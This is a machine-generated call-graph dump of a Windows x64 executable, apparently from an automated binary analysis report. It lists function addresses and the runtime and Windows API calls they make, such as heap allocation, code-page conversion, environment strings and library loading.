8170->8174 8176 7ff7d77ff45e 8171->8176 8172->8090 8181 7ff7d77f808c 47 API calls 8173->8181 8186 7ff7d77ff469 8173->8186 8177 7ff7d77ff40e 8174->8177 8179 7ff7d77f71bc 11 API calls 8175->8179 8180 7ff7d77f7080 47 API calls 8176->8180 8177->8090 8183 7ff7d77fc902 8178->8183 8184 7ff7d77fc8f0 8178->8184 8182 7ff7d77fc8d4 8179->8182 8180->8186 8181->8186 8187 7ff7d77f7080 47 API calls 8182->8187 8189 7ff7d77fc913 8183->8189 8190 7ff7d77fc92a 8183->8190 8188 7ff7d77f71bc 11 API calls 8184->8188 8185->8090 8186->8090 8187->8172 8192 7ff7d77fc8f5 8188->8192 8225 7ff7d77ff43c 8189->8225 8234 7ff7d77ff870 8190->8234 8195 7ff7d77f7080 47 API calls 8192->8195 8195->8172 8196 7ff7d77f71bc 11 API calls 8196->8172 8198 7ff7d77fbc16 8197->8198 8199 7ff7d77fbc33 8197->8199 8198->8199 8200 7ff7d77fbc24 8198->8200 8201 7ff7d77fbc3d 8199->8201 8274 7ff7d77fe258 8199->8274 8202 7ff7d77f71bc 11 API calls 8200->8202 8281 7ff7d77fe294 8201->8281 8204 7ff7d77fbc29 8202->8204 8204->8112 8207 7ff7d77f808c 47 API calls 8206->8207 8208 7ff7d77fe02e 8207->8208 8209 7ff7d77fe03c 8208->8209 8210 7ff7d77fb880 5 API calls 8208->8210 8211 7ff7d77f7f10 14 API calls 8209->8211 8210->8209 8212 7ff7d77fe098 8211->8212 8213 7ff7d77fe128 8212->8213 8214 7ff7d77f808c 47 API calls 8212->8214 8216 7ff7d77fe139 8213->8216 8217 7ff7d77f71dc 11 API calls 8213->8217 8215 7ff7d77fe0ab 8214->8215 8219 7ff7d77fb880 5 API calls 8215->8219 8221 7ff7d77fe0b4 8215->8221 8218 7ff7d77fa57f 8216->8218 8220 7ff7d77f71dc 11 API calls 8216->8220 8217->8216 8218->8133 8218->8134 8219->8221 8220->8218 8222 7ff7d77f7f10 14 API calls 8221->8222 8223 7ff7d77fe10f 8222->8223 8223->8213 8224 7ff7d77fe117 SetEnvironmentVariableW 8223->8224 8224->8213 8226 7ff7d77ff470 8225->8226 8227 7ff7d77ff459 8225->8227 8226->8227 8229 7ff7d77ff47e 8226->8229 8228 7ff7d77f71bc 11 API calls 8227->8228 8230 7ff7d77ff45e 8228->8230 8232 7ff7d77f808c 47 API calls 8229->8232 8233 7ff7d77ff469 8229->8233 8231 7ff7d77f7080 47 API calls 8230->8231 8231->8233 8232->8233 8233->8172 8235 7ff7d77f808c 47 API calls 8234->8235 8236 7ff7d77ff895 8235->8236 8239 7ff7d77ff4ec 8236->8239 8241 7ff7d77ff53a 8239->8241 8240 7ff7d77f1030 8 API calls 8242 7ff7d77fc951 8240->8242 8243 7ff7d77ff5c1 8241->8243 8245 7ff7d77ff5ac GetCPInfo 8241->8245 8248 7ff7d77ff5c5 8241->8248 8242->8172 8242->8196 8244 7ff7d77fa024 MultiByteToWideChar 8243->8244 8243->8248 8246 7ff7d77ff659 8244->8246 8245->8243 8245->8248 8247 7ff7d77fb070 12 API calls 8246->8247 8246->8248 8249 7ff7d77ff690 8246->8249 8247->8249 8248->8240 8249->8248 8250 7ff7d77fa024 MultiByteToWideChar 8249->8250 8251 7ff7d77ff6fe 8250->8251 8252 7ff7d77fa024 MultiByteToWideChar 8251->8252 8261 7ff7d77ff7e0 8251->8261 8254 7ff7d77ff724 8252->8254 8253 7ff7d77f71dc 11 API calls 8253->8248 8255 7ff7d77fb070 12 API calls 8254->8255 8256 7ff7d77ff751 8254->8256 8254->8261 8255->8256 8257 7ff7d77fa024 MultiByteToWideChar 8256->8257 8256->8261 8258 7ff7d77ff7c8 8257->8258 8259 7ff7d77ff7ce 8258->8259 8260 7ff7d77ff7e8 8258->8260 8259->8261 8263 7ff7d77f71dc 11 API calls 8259->8263 8268 7ff7d77fb8c4 8260->8268 8261->8248 8261->8253 8263->8261 8265 7ff7d77ff827 8265->8248 8267 7ff7d77f71dc 11 API calls 8265->8267 8266 7ff7d77f71dc 11 API calls 8266->8265 8267->8248 8269 7ff7d77fb66c 5 API calls 8268->8269 8270 7ff7d77fb902 8269->8270 8271 7ff7d77fb90a 8270->8271 8272 7ff7d77fbb2c 5 API calls 8270->8272 8271->8265 8271->8266 8273 7ff7d77fb973 CompareStringW 8272->8273 8273->8271 8275 7ff7d77fe261 8274->8275 8276 7ff7d77fe27a HeapSize 8274->8276 8277 7ff7d77f71bc 11 API calls 8275->8277 8278 7ff7d77fe266 8277->8278 8279 7ff7d77f7080 47 API calls 8278->8279 8280 7ff7d77fe271 8279->8280 8280->8201 8282 7ff7d77fe2b3 8281->8282 8283 7ff7d77fe2a9 8281->8283 8284 7ff7d77fe2b8 8282->8284 8291 7ff7d77fe2bf 8282->8291 8285 7ff7d77fb070 12 API calls 8283->8285 8286 7ff7d77f71dc 11 API calls 8284->8286 8289 7ff7d77fe2b1 8285->8289 8286->8289 8287 7ff7d77fe2c5 8290 7ff7d77f71bc 11 API calls 8287->8290 8288 7ff7d77fe2f2 HeapReAlloc 8288->8289 8288->8291 8289->8204 8290->8289 8291->8287 8291->8288 8292 7ff7d77fbd98 2 API calls 8291->8292 8292->8291 8535 7ff7d780201a 8538 7ff7d77f205c 8535->8538 8539 7ff7d77f2086 8538->8539 8540 7ff7d77f2074 8538->8540 8542 7ff7d77f21bc 56 API calls 8539->8542 8540->8539 8541 7ff7d77f207c 8540->8541 8544 7ff7d77f21bc 56 API calls 8541->8544 8547 7ff7d77f2084 8541->8547 8543 7ff7d77f208b 8542->8543 8545 7ff7d77f21bc 56 API calls 8543->8545 8543->8547 8546 7ff7d77f20ab 8544->8546 8545->8547 8548 7ff7d77f21bc 56 API calls 8546->8548 8549 7ff7d77f20b8 8548->8549 8550 7ff7d77f6a40 47 API calls 8549->8550 8551 7ff7d77f20c1 8550->8551 8644 7ff7d77f6998 8645 7ff7d77f71dc 11 API calls 8644->8645 8646 7ff7d77f69a8 8645->8646 8647 7ff7d77f71dc 11 API calls 8646->8647 8648 7ff7d77f69bc 8647->8648 8649 7ff7d77f71dc 11 API calls 8648->8649 8650 7ff7d77f69d0 8649->8650 8651 7ff7d77f71dc 11 API calls 8650->8651 8652 7ff7d77f69e4 8651->8652 8840 7ff7d77f1118 8847 7ff7d77f1a6c SetUnhandledExceptionFilter 8840->8847 8552 7ff7d7801e36 8553 7ff7d7801eb9 8552->8553 8554 7ff7d7801e4e 8552->8554 8554->8553 8555 7ff7d77f21bc 56 API calls 8554->8555 8556 7ff7d7801e9b 8555->8556 8557 7ff7d77f21bc 56 API calls 8556->8557 8558 7ff7d7801eb0 8557->8558 8559 7ff7d77f6a40 47 API calls 8558->8559 8559->8553 6880 7ff7d77f1134 6903 7ff7d77f159c 6880->6903 6883 7ff7d77f128b 6935 7ff7d77f18c8 IsProcessorFeaturePresent 6883->6935 6885 7ff7d77f1155 6886 7ff7d77f1295 6885->6886 6887 7ff7d77f1173 6885->6887 6888 7ff7d77f18c8 7 API calls 6886->6888 6893 7ff7d77f1194 6887->6893 6911 7ff7d77f5f94 6887->6911 6891 7ff7d77f12a0 6888->6891 6890 7ff7d77f1198 6892 7ff7d77f121e 6915 7ff7d77f5ef8 6892->6915 6893->6890 6893->6892 6924 7ff7d77f62a4 6893->6924 6896 7ff7d77f1223 6921 7ff7d77f1000 6896->6921 6900 7ff7d77f1247 6900->6891 6931 7ff7d77f1720 6900->6931 6904 7ff7d77f15a4 6903->6904 6942 7ff7d77f1f28 6904->6942 6907 7ff7d77f114d 6907->6883 6907->6885 6912 7ff7d77f5fa7 6911->6912 6913 7ff7d77f5fce 6912->6913 7454 7ff7d77f1050 6912->7454 6913->6893 6916 7ff7d77f5f08 6915->6916 6919 7ff7d77f5f1d 6915->6919 6916->6919 7583 7ff7d77f5b98 6916->7583 6919->6896 7660 7ff7d77f5480 6921->7660 6925 7ff7d77f62bb 6924->6925 6926 7ff7d77f62dc 6924->6926 6925->6892 7777 7ff7d77f6a40 6926->7777 6929 7ff7d77f1a18 GetModuleHandleW 6930 7ff7d77f1a29 6929->6930 6930->6900 6932 7ff7d77f1731 6931->6932 6933 7ff7d77f125e 6932->6933 6934 7ff7d77f1f50 7 API calls 6932->6934 6933->6890 6934->6933 6936 7ff7d77f18ee 6935->6936 6937 7ff7d77f190d RtlCaptureContext RtlLookupFunctionEntry 6936->6937 6938 7ff7d77f1936 RtlVirtualUnwind 6937->6938 6939 7ff7d77f1972 6937->6939 6938->6939 6940 7ff7d77f19a4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6939->6940 6941 7ff7d77f19f2 6940->6941 6941->6886 6961 7ff7d77f2304 6942->6961 6945 7ff7d77f15b5 6945->6907 6949 7ff7d77f69f4 6945->6949 6950 7ff7d77fbcb4 6949->6950 6951 7ff7d77f15c2 6950->6951 6997 7ff7d77f9c60 6950->6997 7003 7ff7d77f9ba8 6950->7003 7018 7ff7d77fad40 6950->7018 6951->6907 6955 7ff7d77f1f50 6951->6955 6956 7ff7d77f1f62 6955->6956 6957 7ff7d77f1f58 6955->6957 6956->6907 7446 7ff7d77f22e0 6957->7446 6960 7ff7d77f234c DeleteCriticalSection 6960->6956 6962 7ff7d77f230c 6961->6962 6964 7ff7d77f233d 6962->6964 6966 7ff7d77f1f31 6962->6966 6978 7ff7d77f2600 6962->6978 6965 7ff7d77f234c DeleteCriticalSection 6964->6965 6965->6966 6966->6945 6967 7ff7d77f2298 6966->6967 6993 7ff7d77f24d4 6967->6993 6983 7ff7d77f2384 6978->6983 6981 7ff7d77f2640 6981->6962 6982 7ff7d77f264b InitializeCriticalSectionAndSpinCount 6982->6981 6984 7ff7d77f246e 6983->6984 6990 7ff7d77f23c8 6983->6990 6984->6981 6984->6982 6985 7ff7d77f23f6 LoadLibraryExW 6987 7ff7d77f2495 6985->6987 6988 7ff7d77f2417 GetLastError 6985->6988 6986 7ff7d77f24b5 GetProcAddress 6986->6984 6989 7ff7d77f24c6 6986->6989 6987->6986 6991 7ff7d77f24ac FreeLibrary 6987->6991 6988->6990 6989->6984 6990->6984 6990->6985 6990->6986 6992 7ff7d77f2439 LoadLibraryExW 6990->6992 6991->6986 6992->6987 6992->6990 6994 7ff7d77f2384 5 API calls 6993->6994 6996 7ff7d77f24f9 TlsAlloc 6994->6996 6998 7ff7d77f9c6d 6997->6998 6999 7ff7d77f9cb2 6997->6999 7029 7ff7d77f8664 6998->7029 6999->6950 7004 7ff7d77f9bcb 7003->7004 7005 7ff7d77f9bd5 7004->7005 7444 7ff7d77fa734 EnterCriticalSection 7004->7444 7007 7ff7d77f9c47 7005->7007 7008 7ff7d77f6ae8 47 API calls 7005->7008 7007->6950 7012 7ff7d77f9c5f 7008->7012 7013 7ff7d77f9cb2 7012->7013 7015 7ff7d77f8664 52 API calls 7012->7015 7013->6950 7016 7ff7d77f9c9c 7015->7016 7017 7ff7d77f9938 68 API calls 7016->7017 7017->7013 7445 7ff7d77fa734 EnterCriticalSection 7018->7445 7020 7ff7d77fad50 7021 7ff7d77fa900 53 API calls 7020->7021 7022 7ff7d77fad59 7021->7022 7023 7ff7d77fad67 7022->7023 7024 7ff7d77fab48 55 API calls 7022->7024 7025 7ff7d77fa788 LeaveCriticalSection 7023->7025 7026 7ff7d77fad62 7024->7026 7027 7ff7d77fad73 7025->7027 7028 7ff7d77fac38 GetStdHandle GetFileType 7026->7028 7027->6950 7028->7023 7030 7ff7d77f8675 FlsGetValue 7029->7030 7031 7ff7d77f8690 FlsSetValue 7029->7031 7032 7ff7d77f8682 7030->7032 7033 7ff7d77f868a 7030->7033 7031->7032 7034 7ff7d77f869d 7031->7034 7038 7ff7d77f8688 7032->7038 7090 7ff7d77f6ae8 7032->7090 7033->7031 7072 7ff7d77f88f0 7034->7072 7049 7ff7d77f9938 7038->7049 7040 7ff7d77f86ca FlsSetValue 7043 7ff7d77f86d6 FlsSetValue 7040->7043 7044 7ff7d77f86e8 7040->7044 7041 7ff7d77f86ba FlsSetValue 7042 7ff7d77f86c3 7041->7042 7079 7ff7d77f71dc 7042->7079 7043->7042 7085 7ff7d77f8340 7044->7085 7050 7ff7d77f9ba8 68 API calls 7049->7050 7051 7ff7d77f996d 7050->7051 7281 7ff7d77f9638 7051->7281 7054 7ff7d77f998a 7054->6999 7057 7ff7d77f99a3 7058 7ff7d77f71dc 11 API calls 7057->7058 7058->7054 7059 7ff7d77f99b2 7059->7059 7296 7ff7d77f9cdc 7059->7296 7062 7ff7d77f9aae 7063 7ff7d77f71bc 11 API calls 7062->7063 7064 7ff7d77f9ab3 7063->7064 7066 7ff7d77f71dc 11 API calls 7064->7066 7065 7ff7d77f9b09 7068 7ff7d77f9b70 7065->7068 7307 7ff7d77f9468 7065->7307 7066->7054 7067 7ff7d77f9ac8 7067->7065 7070 7ff7d77f71dc 11 API calls 7067->7070 7069 7ff7d77f71dc 11 API calls 7068->7069 7069->7054 7070->7065 7077 7ff7d77f8901 7072->7077 7073 7ff7d77f8952 7102 7ff7d77f71bc 7073->7102 7074 7ff7d77f8936 HeapAlloc 7075 7ff7d77f86ac 7074->7075 7074->7077 7075->7040 7075->7041 7077->7073 7077->7074 7099 7ff7d77fbd98 7077->7099 7080 7ff7d77f71e1 HeapFree 7079->7080 7084 7ff7d77f7210 7079->7084 7081 7ff7d77f71fc GetLastError 7080->7081 7080->7084 7082 7ff7d77f7209 7081->7082 7083 7ff7d77f71bc 9 API calls 7082->7083 7083->7084 7084->7032 7128 7ff7d77f8218 7085->7128 7142 7ff7d77fbe58 7090->7142 7105 7ff7d77fbdd8 7099->7105 7111 7ff7d77f8708 GetLastError 7102->7111 7104 7ff7d77f71c5 7104->7075 7110 7ff7d77fa734 EnterCriticalSection 7105->7110 7112 7ff7d77f872c 7111->7112 7113 7ff7d77f8749 FlsSetValue 7111->7113 7112->7113 7125 7ff7d77f8739 7112->7125 7114 7ff7d77f875b 7113->7114 7113->7125 7116 7ff7d77f88f0 5 API calls 7114->7116 7115 7ff7d77f87b5 SetLastError 7115->7104 7117 7ff7d77f876a 7116->7117 7118 7ff7d77f8788 FlsSetValue 7117->7118 7119 7ff7d77f8778 FlsSetValue 7117->7119 7121 7ff7d77f87a6 7118->7121 7122 7ff7d77f8794 FlsSetValue 7118->7122 7120 7ff7d77f8781 7119->7120 7123 7ff7d77f71dc 5 API calls 7120->7123 7124 7ff7d77f8340 5 API calls 7121->7124 7122->7120 7123->7125 7126 7ff7d77f87ae 7124->7126 7125->7115 7127 7ff7d77f71dc 5 API calls 7126->7127 7127->7115 7140 7ff7d77fa734 EnterCriticalSection 7128->7140 7176 7ff7d77fbe10 7142->7176 7181 7ff7d77fa734 EnterCriticalSection 7176->7181 7322 7ff7d77f808c 7281->7322 7284 7ff7d77f966a 7286 7ff7d77f966f GetACP 7284->7286 7287 7ff7d77f967f 7284->7287 7285 7ff7d77f9658 GetOEMCP 7285->7287 7286->7287 7287->7054 7288 7ff7d77fb070 7287->7288 7289 7ff7d77fb0bb 7288->7289 7294 7ff7d77fb07f 7288->7294 7290 7ff7d77f71bc 11 API calls 7289->7290 7293 7ff7d77f999b 7290->7293 7291 7ff7d77fb0a2 HeapAlloc 7292 7ff7d77fb0b9 7291->7292 7291->7294 7292->7293 7293->7057 7293->7059 7294->7289 7294->7291 7295 7ff7d77fbd98 2 API calls 7294->7295 7295->7294 7297 7ff7d77f9638 49 API calls 7296->7297 7298 7ff7d77f9d09 7297->7298 7299 7ff7d77f9e5f 7298->7299 7301 7ff7d77f9d46 IsValidCodePage 7298->7301 7306 7ff7d77f9d60 7298->7306 7300 7ff7d77f1030 8 API calls 7299->7300 7302 7ff7d77f9aa5 7300->7302 7301->7299 7303 7ff7d77f9d57 7301->7303 7302->7062 7302->7067 7304 7ff7d77f9d86 GetCPInfo 7303->7304 7303->7306 7304->7299 7304->7306 7354 7ff7d77f9750 7306->7354 7443 7ff7d77fa734 EnterCriticalSection 7307->7443 7323 7ff7d77f80b0 7322->7323 7329 7ff7d77f80ab 7322->7329 7324 7ff7d77f8590 47 API calls 7323->7324 7323->7329 7325 7ff7d77f80cb 7324->7325 7330 7ff7d77fc600 7325->7330 7329->7284 7329->7285 7331 7ff7d77fc615 7330->7331 7332 7ff7d77f80ee 7330->7332 7331->7332 7338 7ff7d77fb594 7331->7338 7334 7ff7d77fc66c 7332->7334 7335 7ff7d77fc694 7334->7335 7336 7ff7d77fc681 7334->7336 7335->7329 7336->7335 7351 7ff7d77f9cc0 7336->7351 7339 7ff7d77f8590 47 API calls 7338->7339 7340 7ff7d77fb5a3 7339->7340 7341 7ff7d77fb5ee 7340->7341 7350 7ff7d77fa734 EnterCriticalSection 7340->7350 7341->7332 7352 7ff7d77f8590 47 API calls 7351->7352 7353 7ff7d77f9cc9 7352->7353 7355 7ff7d77f978d GetCPInfo 7354->7355 7364 7ff7d77f9883 7354->7364 7361 7ff7d77f97a0 7355->7361 7355->7364 7356 7ff7d77f1030 8 API calls 7357 7ff7d77f9922 7356->7357 7357->7299 7365 7ff7d77fb0d0 7361->7365 7363 7ff7d77fdf18 57 API calls 7363->7364 7364->7356 7366 7ff7d77f808c 47 API calls 7365->7366 7367 7ff7d77fb112 7366->7367 7385 7ff7d77fa024 7367->7385 7369 7ff7d77fb14f 7372 7ff7d77f1030 8 API calls 7369->7372 7370 7ff7d77fb148 7370->7369 7371 7ff7d77fb070 12 API calls 7370->7371 7373 7ff7d77fb20c 7370->7373 7376 7ff7d77fb178 7370->7376 7371->7376 7374 7ff7d77f9817 7372->7374 7373->7369 7375 7ff7d77f71dc 11 API calls 7373->7375 7380 7ff7d77fdf18 7374->7380 7375->7369 7376->7373 7377 7ff7d77fa024 MultiByteToWideChar 7376->7377 7378 7ff7d77fb1ee 7377->7378 7378->7373 7379 7ff7d77fb1f2 GetStringTypeW 7378->7379 7379->7373 7381 7ff7d77f808c 47 API calls 7380->7381 7382 7ff7d77fdf3d 7381->7382 7388 7ff7d77fdbe4 7382->7388 7386 7ff7d77fa02d MultiByteToWideChar 7385->7386 7389 7ff7d77fdc25 7388->7389 7390 7ff7d77fa024 MultiByteToWideChar 7389->7390 7393 7ff7d77fdc6f 7390->7393 7391 7ff7d77fdeed 7392 7ff7d77f1030 8 API calls 7391->7392 7394 7ff7d77f984a 7392->7394 7393->7391 7395 7ff7d77fb070 12 API calls 7393->7395 7396 7ff7d77fdda5 7393->7396 7398 7ff7d77fdca7 7393->7398 7394->7363 7395->7398 7396->7391 7397 7ff7d77f71dc 11 API calls 7396->7397 7397->7391 7398->7396 7399 7ff7d77fa024 MultiByteToWideChar 7398->7399 7400 7ff7d77fdd1a 7399->7400 7400->7396 7419 7ff7d77fba40 7400->7419 7403 7ff7d77fddb6 7405 7ff7d77fb070 12 API calls 7403->7405 7407 7ff7d77fde88 7403->7407 7408 7ff7d77fddd4 7403->7408 7404 7ff7d77fdd65 7404->7396 7406 7ff7d77fba40 7 API calls 7404->7406 7405->7408 7406->7396 7407->7396 7409 7ff7d77f71dc 11 API calls 7407->7409 7408->7396 7410 7ff7d77fba40 7 API calls 7408->7410 7409->7396 7411 7ff7d77fde54 7410->7411 7411->7407 7412 7ff7d77fde74 7411->7412 7413 7ff7d77fde8a 7411->7413 7427 7ff7d77fa0b4 7412->7427 7415 7ff7d77fa0b4 WideCharToMultiByte 7413->7415 7416 7ff7d77fde82 7415->7416 7416->7407 7417 7ff7d77fdea2 7416->7417 7417->7396 7418 7ff7d77f71dc 11 API calls 7417->7418 7418->7396 7430 7ff7d77fb66c 7419->7430 7422 7ff7d77fba86 LCMapStringEx 7424 7ff7d77fbb17 7422->7424 7423 7ff7d77fbae5 7440 7ff7d77fbb2c 7423->7440 7424->7396 7424->7403 7424->7404 7426 7ff7d77fbaef LCMapStringW 7426->7424 7429 7ff7d77fa0d8 WideCharToMultiByte 7427->7429 7431 7ff7d77fb6c9 7430->7431 7437 7ff7d77fb6c4 7430->7437 7431->7422 7431->7423 7432 7ff7d77fb6f9 LoadLibraryExW 7433 7ff7d77fb7ce 7432->7433 7434 7ff7d77fb71e GetLastError 7432->7434 7435 7ff7d77fb7ee GetProcAddress 7433->7435 7436 7ff7d77fb7e5 FreeLibrary 7433->7436 7434->7437 7435->7431 7438 7ff7d77fb7ff 7435->7438 7436->7435 7437->7431 7437->7432 7437->7435 7439 7ff7d77fb758 LoadLibraryExW 7437->7439 7438->7431 7439->7433 7439->7437 7441 7ff7d77fb66c LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 7440->7441 7442 7ff7d77fbb5a 7441->7442 7442->7426 7447 7ff7d77f22ef 7446->7447 7448 7ff7d77f1f5d 7446->7448 7450 7ff7d77f251c 7447->7450 7448->6960 7451 7ff7d77f2384 5 API calls 7450->7451 7453 7ff7d77f2543 TlsFree 7451->7453 7455 7ff7d77f1060 7454->7455 7471 7ff7d77f62f0 7455->7471 7457 7ff7d77f106c 7477 7ff7d77f15d8 7457->7477 7459 7ff7d77f18c8 7 API calls 7461 7ff7d77f1105 7459->7461 7460 7ff7d77f1084 7469 7ff7d77f10d9 7460->7469 7482 7ff7d77f1788 7460->7482 7461->6912 7463 7ff7d77f1099 7485 7ff7d77f5a10 7463->7485 7467 7ff7d77f10ae 7468 7ff7d77f6414 47 API calls 7467->7468 7468->7469 7469->7459 7470 7ff7d77f10f5 7469->7470 7470->6912 7472 7ff7d77f6301 7471->7472 7473 7ff7d77f6309 7472->7473 7474 7ff7d77f71bc 11 API calls 7472->7474 7473->7457 7475 7ff7d77f6318 7474->7475 7476 7ff7d77f7080 47 API calls 7475->7476 7476->7473 7478 7ff7d77f15ee 7477->7478 7479 7ff7d77f15e9 7477->7479 7478->7460 7479->7478 7480 7ff7d77f18c8 7 API calls 7479->7480 7481 7ff7d77f1662 7480->7481 7518 7ff7d77f174c 7482->7518 7484 7ff7d77f1791 7484->7463 7486 7ff7d77f5a30 7485->7486 7496 7ff7d77f10a5 7485->7496 7487 7ff7d77f5a4e 7486->7487 7488 7ff7d77f5a38 7486->7488 7490 7ff7d77f9c60 68 API calls 7487->7490 7489 7ff7d77f71bc 11 API calls 7488->7489 7492 7ff7d77f5a3d 7489->7492 7491 7ff7d77f5a53 7490->7491 7533 7ff7d77f9344 GetModuleFileNameW 7491->7533 7494 7ff7d77f7080 47 API calls 7492->7494 7494->7496 7496->7469 7517 7ff7d77f1860 InitializeSListHead 7496->7517 7501 7ff7d77f5ac5 7504 7ff7d77f71bc 11 API calls 7501->7504 7502 7ff7d77f5add 7503 7ff7d77f57e8 47 API calls 7502->7503 7510 7ff7d77f5af9 7503->7510 7505 7ff7d77f5aca 7504->7505 7507 7ff7d77f71dc 11 API calls 7505->7507 7506 7ff7d77f5aff 7509 7ff7d77f71dc 11 API calls 7506->7509 7508 7ff7d77f5ad8 7507->7508 7508->7496 7509->7496 7510->7506 7511 7ff7d77f5b44 7510->7511 7512 7ff7d77f5b2b 7510->7512 7515 7ff7d77f71dc 11 API calls 7511->7515 7513 7ff7d77f71dc 11 API calls 7512->7513 7514 7ff7d77f5b34 7513->7514 7516 7ff7d77f71dc 11 API calls 7514->7516 7515->7506 7516->7508 7519 7ff7d77f1766 7518->7519 7521 7ff7d77f175f 7518->7521 7522 7ff7d77f6880 7519->7522 7521->7484 7525 7ff7d77f64bc 7522->7525 7532 7ff7d77fa734 EnterCriticalSection 7525->7532 7534 7ff7d77f939d 7533->7534 7535 7ff7d77f9389 GetLastError 7533->7535 7536 7ff7d77f808c 47 API calls 7534->7536 7557 7ff7d77f7130 7535->7557 7539 7ff7d77f93cb 7536->7539 7538 7ff7d77f9396 7540 7ff7d77f1030 8 API calls 7538->7540 7544 7ff7d77f93dc 7539->7544 7562 7ff7d77fb880 7539->7562 7543 7ff7d77f5a6a 7540->7543 7545 7ff7d77f57e8 7543->7545 7565 7ff7d77f9228 7544->7565 7547 7ff7d77f5826 7545->7547 7549 7ff7d77f5892 7547->7549 7579 7ff7d77fa010 7547->7579 7548 7ff7d77f5983 7551 7ff7d77f59b0 7548->7551 7549->7548 7550 7ff7d77fa010 47 API calls 7549->7550 7550->7549 7552 7ff7d77f5a00 7551->7552 7553 7ff7d77f59c8 7551->7553 7552->7501 7552->7502 7553->7552 7554 7ff7d77f88f0 11 API calls 7553->7554 7555 7ff7d77f59f6 7554->7555 7556 7ff7d77f71dc 11 API calls 7555->7556 7556->7552 7558 7ff7d77f8708 11 API calls 7557->7558 7559 7ff7d77f713d 7558->7559 7560 7ff7d77f8708 11 API calls 7559->7560 7561 7ff7d77f715f 7560->7561 7561->7538 7563 7ff7d77fb66c 5 API calls 7562->7563 7564 7ff7d77fb8a0 7563->7564 7564->7544 7566 7ff7d77f924c 7565->7566 7567 7ff7d77f9267 7565->7567 7566->7538 7568 7ff7d77fa0b4 WideCharToMultiByte 7567->7568 7569 7ff7d77f926c 7567->7569 7570 7ff7d77f92c3 7568->7570 7569->7566 7571 7ff7d77f71bc 11 API calls 7569->7571 7570->7569 7572 7ff7d77f92ca GetLastError 7570->7572 7574 7ff7d77f92f5 7570->7574 7571->7566 7573 7ff7d77f7130 11 API calls 7572->7573 7576 7ff7d77f92d7 7573->7576 7575 7ff7d77fa0b4 WideCharToMultiByte 7574->7575 7577 7ff7d77f931c 7575->7577 7578 7ff7d77f71bc 11 API calls 7576->7578 7577->7566 7577->7572 7578->7566 7580 7ff7d77f9f9c 7579->7580 7581 7ff7d77f808c 47 API calls 7580->7581 7582 7ff7d77f9fc0 7581->7582 7582->7547 7584 7ff7d77f5bb1 7583->7584 7585 7ff7d77f5bad 7583->7585 7586 7ff7d77f9c60 68 API calls 7584->7586 7585->6919 7598 7ff7d77f5d60 7585->7598 7587 7ff7d77f5bb6 7586->7587 7606 7ff7d77fa194 GetEnvironmentStringsW 7587->7606 7590 7ff7d77f5bc3 7592 7ff7d77f71dc 11 API calls 7590->7592 7591 7ff7d77f5bcf 7626 7ff7d77f5c0c 7591->7626 7592->7585 7595 7ff7d77f71dc 11 API calls 7596 7ff7d77f5bf6 7595->7596 7597 7ff7d77f71dc 11 API calls 7596->7597 7597->7585 7599 7ff7d77f5d89 7598->7599 7602 7ff7d77f5da2 7598->7602 7599->6919 7600 7ff7d77fa0b4 WideCharToMultiByte 7600->7602 7601 7ff7d77f88f0 11 API calls 7601->7602 7602->7599 7602->7600 7602->7601 7603 7ff7d77f5e32 7602->7603 7605 7ff7d77f71dc 11 API calls 7602->7605 7604 7ff7d77f71dc 11 API calls 7603->7604 7604->7599 7605->7602 7607 7ff7d77fa1c4 7606->7607 7608 7ff7d77f5bbb 7606->7608 7609 7ff7d77fa0b4 WideCharToMultiByte 7607->7609 7608->7590 7608->7591 7610 7ff7d77fa215 7609->7610 7611 7ff7d77fa21c FreeEnvironmentStringsW 7610->7611 7612 7ff7d77fb070 12 API calls 7610->7612 7611->7608 7613 7ff7d77fa22f 7612->7613 7614 7ff7d77fa240 7613->7614 7615 7ff7d77fa237 7613->7615 7617 7ff7d77fa0b4 WideCharToMultiByte 7614->7617 7616 7ff7d77f71dc 11 API calls 7615->7616 7618 7ff7d77fa23e 7616->7618 7619 7ff7d77fa263 7617->7619 7618->7611 7620 7ff7d77fa271 7619->7620 7621 7ff7d77fa267 7619->7621 7623 7ff7d77f71dc 11 API calls 7620->7623 7622 7ff7d77f71dc 11 API calls 7621->7622 7624 7ff7d77fa26f FreeEnvironmentStringsW 7622->7624 7623->7624 7624->7608 7627 7ff7d77f5c31 7626->7627 7628 7ff7d77f88f0 11 API calls 7627->7628 7629 7ff7d77f5c67 7628->7629 7631 7ff7d77f5ce2 7629->7631 7634 7ff7d77f88f0 11 API calls 7629->7634 7635 7ff7d77f5cd1 7629->7635 7639 7ff7d77f5d07 7629->7639 7642 7ff7d77f71dc 11 API calls 7629->7642 7643 7ff7d77f5c6f 7629->7643 7645 7ff7d77f6a88 7629->7645 7630 7ff7d77f71dc 11 API calls 7633 7ff7d77f5bd7 7630->7633 7632 7ff7d77f71dc 11 API calls 7631->7632 7632->7633 7633->7595 7634->7629 7654 7ff7d77f5d1c 7635->7654 7641 7ff7d77f70a0 17 API calls 7639->7641 7640 7ff7d77f71dc 11 API calls 7640->7643 7644 7ff7d77f5d1a 7641->7644 7642->7629 7643->7630 7646 7ff7d77f6a95 7645->7646 7648 7ff7d77f6a9f 7645->7648 7646->7648 7652 7ff7d77f6aba 7646->7652 7647 7ff7d77f71bc 11 API calls 7649 7ff7d77f6aa6 7647->7649 7648->7647 7651 7ff7d77f7080 47 API calls 7649->7651 7650 7ff7d77f6ab2 7650->7629 7651->7650 7652->7650 7653 7ff7d77f71bc 11 API calls 7652->7653 7653->7649 7655 7ff7d77f5d21 7654->7655 7656 7ff7d77f5cd9 7654->7656 7657 7ff7d77f5d4a 7655->7657 7658 7ff7d77f71dc 11 API calls 7655->7658 7656->7640 7659 7ff7d77f71dc 11 API calls 7657->7659 7658->7655 7659->7656 7693 7ff7d77f7398 7660->7693 7663 7ff7d77f54c4 7666 7ff7d77f54f3 7663->7666 7667 7ff7d77f54c9 7663->7667 7664 7ff7d77f55b2 7665 7ff7d77f70a0 17 API calls 7664->7665 7668 7ff7d77f55c6 7665->7668 7670 7ff7d77f5540 7666->7670 7673 7ff7d77f71bc 11 API calls 7666->7673 7669 7ff7d77f54d6 7667->7669 7667->7670 7696 7ff7d77f8128 7669->7696 7672 7ff7d77f71dc 11 API calls 7670->7672 7675 7ff7d77f54e8 7672->7675 7676 7ff7d77f5518 7673->7676 7674 7ff7d77f54dd 7677 7ff7d77f71dc 11 API calls 7674->7677 7678 7ff7d77f1030 8 API calls 7675->7678 7679 7ff7d77f71bc 11 API calls 7676->7679 7677->7675 7680 